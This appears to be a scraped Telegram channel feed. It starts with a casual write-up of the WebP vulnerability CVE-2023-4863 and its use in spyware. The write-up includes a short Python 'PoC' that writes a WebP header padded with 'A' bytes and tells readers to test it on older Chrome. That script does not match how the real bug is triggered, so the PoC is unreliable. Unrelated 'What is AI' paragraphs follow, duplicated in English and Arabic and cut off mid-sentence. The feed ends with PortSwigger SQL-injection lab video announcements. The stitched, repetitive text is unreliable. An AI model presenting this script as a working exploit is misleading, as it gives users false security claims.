Let’s talk about an old but still dangerous vulnerability that might still be alive today 💀
---
Note: The writing style of this article is original, but the information itself is public and not copyrighted. ✨
Thanks for reading — hope you found it useful! 🤍
Today’s CVE: CVE-2023-4863
Back in September 2023, a real-world attack took place using a vulnerability in the WebP Image Format.
This vulnerability was actively exploited in real attacks, and the ones who discovered it were:
Apple Security Engineering
Citizen Lab
Impact?
The vulnerability affected major and popular browsers and apps like:
Google Chrome
Firefox
Microsoft Edge
Adobe
Basically, anything using the libwebp library was vulnerable.
---
The Attack: Heap Buffer Overflow → RCE
The vulnerability is a Heap Buffer Overflow, but it gets worse — attackers were able to escalate this into Remote Code Execution (RCE).
---
So Spider, what makes this vuln different from any other one?
Well, this one was used in major malware/spyware tools like:
Spyware
Predator
And yes, even Pegasus
---
How did it work?
All the attacker had to do was get the victim to open a malicious WebP image — either by downloading it or visiting a site with the image embedded.
Once loaded, the attack would be triggered and could lead to full device compromise.
---
Here’s a simple PoC to show how it works:
# generate_malicious_webp.py
with open("malicious.webp", "wb") as f:
f.write(b"RIFF")
f.write(b"\x00\x00\x00\x00") # fake size
f.write(b"WEBPVP8X")
f.write(b"A" * 1000000) # overflow buffer
To test this PoC, use Chrome version < 116
---
How to stay safe?
1. Update your browser to the latest version
2. Don’t click on shady or unknown links
3. Check your libwebp version, and update it if it’s outdated
---
Note: The writing style of this article is original, but the information itself is public and not copyrighted. ✨
Thanks for reading — hope you found it useful! 🤍
*What is AI*?
Artificial Intelligence is a subfield of computer science that focuses on creating intelligent agents capable of performing tasks that would typically require human levels of intelligence. These tasks include problem-solving, speech recognition, and decision-making, among others.
AI is an interdisciplinary science with many approaches; it can be rule-based and operate under a predefined set or conditions, or it can use machine learning algorithms to adapt to its environment. The latter is particularly powerful, as it allows AI systems to learn from data, making them more versatile and capable of handling unforeseen scenarios.
*Common misconceptions*
It’s also worth mentioning what AI isn’t. There are a lot of misconceptions about what artificial is, and here are some common incorrect beliefs:
- AI is synonymous with robots. AI is not limited to robotics;
Artificial Intelligence is a subfield of computer science that focuses on creating intelligent agents capable of performing tasks that would typically require human levels of intelligence. These tasks include problem-solving, speech recognition, and decision-making, among others.
AI is an interdisciplinary science with many approaches; it can be rule-based and operate under a predefined set or conditions, or it can use machine learning algorithms to adapt to its environment. The latter is particularly powerful, as it allows AI systems to learn from data, making them more versatile and capable of handling unforeseen scenarios.
*Common misconceptions*
It’s also worth mentioning what AI isn’t. There are a lot of misconceptions about what artificial is, and here are some common incorrect beliefs:
- AI is synonymous with robots. AI is not limited to robotics;
ما هو الذكاء الاصطناعي؟
الذكاء الاصطناعي هو فرع من فروع علوم الحاسوب يركز على إنشاء وكلاء أذكياء قادرين على أداء مهام تتطلب عادة مستويات من الذكاء البشري. وتشمل هذه المهام حل المشكلات، والتعرف على الكلام، واتخاذ القرارات، وغيرها.
الذكاء الاصطناعي علم متعدد التخصصات وله العديد من الأساليب؛ يمكن أن يكون قائمًا على القواعد ويعمل وفق مجموعة محددة مسبقًا من الشروط، أو يمكنه استخدام خوارزميات التعلم الآلي للتكيف مع بيئته. الطريقة الثانية تُعتبر الأقوى، لأنها تُمكّن أنظمة الذكاء الاصطناعي من التعلم من البيانات، مما يجعلها أكثر مرونة وقدرة على التعامل مع السيناريوهات غير المتوقعة.
المفاهيم الخاطئة الشائعة
من المهم أيضًا توضيح ما ليس عليه الذكاء الاصطناعي. هناك العديد من المفاهيم الخاطئة حول الذكاء الاصطناعي، وفيما يلي بعض المعتقدات غير الصحيحة الشائعة:
الذكاء الاصطناعي هو نفسه الروبوتات. الذكاء الاصطناعي لا يقتصر على الروبوتات؛
الذكاء الاصطناعي هو فرع من فروع علوم الحاسوب يركز على إنشاء وكلاء أذكياء قادرين على أداء مهام تتطلب عادة مستويات من الذكاء البشري. وتشمل هذه المهام حل المشكلات، والتعرف على الكلام، واتخاذ القرارات، وغيرها.
الذكاء الاصطناعي علم متعدد التخصصات وله العديد من الأساليب؛ يمكن أن يكون قائمًا على القواعد ويعمل وفق مجموعة محددة مسبقًا من الشروط، أو يمكنه استخدام خوارزميات التعلم الآلي للتكيف مع بيئته. الطريقة الثانية تُعتبر الأقوى، لأنها تُمكّن أنظمة الذكاء الاصطناعي من التعلم من البيانات، مما يجعلها أكثر مرونة وقدرة على التعامل مع السيناريوهات غير المتوقعة.
المفاهيم الخاطئة الشائعة
من المهم أيضًا توضيح ما ليس عليه الذكاء الاصطناعي. هناك العديد من المفاهيم الخاطئة حول الذكاء الاصطناعي، وفيما يلي بعض المعتقدات غير الصحيحة الشائعة:
الذكاء الاصطناعي هو نفسه الروبوتات. الذكاء الاصطناعي لا يقتصر على الروبوتات؛
هنزل سلسله بورت سويجر لاب من تلفون قريب 🔥❤️
I'm going to drop a Burp Suite lab series from my phone soon! 🔥❤️
I'm going to drop a Burp Suite lab series from my phone soon! 🔥❤️
🌚3
Media is too big
VIEW IN TELEGRAM
عشان يكون مفيش ملل اي الغلطه الي انا عملتها 😔
*بورت سويجر لاب sql part 1*
*Port Swiger Lab SQL Part 1*
So that it’s not boring, what mistake did I make? 😔
ان شاء الله كل يوم فيديو لحل لابات بورت سويجر لحد ما نخلصها 🤍
video every day solving PortSwigger labs until we finish them all. 🤍
video every day solving PortSwigger labs until we finish them all. 🤍
❤2
Media is too big
VIEW IN TELEGRAM
لاب sql injection اتمنه الحل يكون وقعي علي قد مقدر اعذروني علي القطع بس القطع عشان لو رساله او اي شئ شخصي 🤍
It's a SQL Injection lab. I hope the solution is realistic as much as possible. Sorry for the interruptions, they're just in case of any messages or personal stuff. 🤍
Sqli part 2
It's a SQL Injection lab. I hope the solution is realistic as much as possible. Sorry for the interruptions, they're just in case of any messages or personal stuff. 🤍
😢1
Media is too big
VIEW IN TELEGRAM
Sqli part 3
Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
❤2
Media is too big
VIEW IN TELEGRAM
Labs Sqli Part 4
Lab: SQL injection attack, listing the database contents on Oracle
Lab: SQL injection attack, listing the database contents on Oracle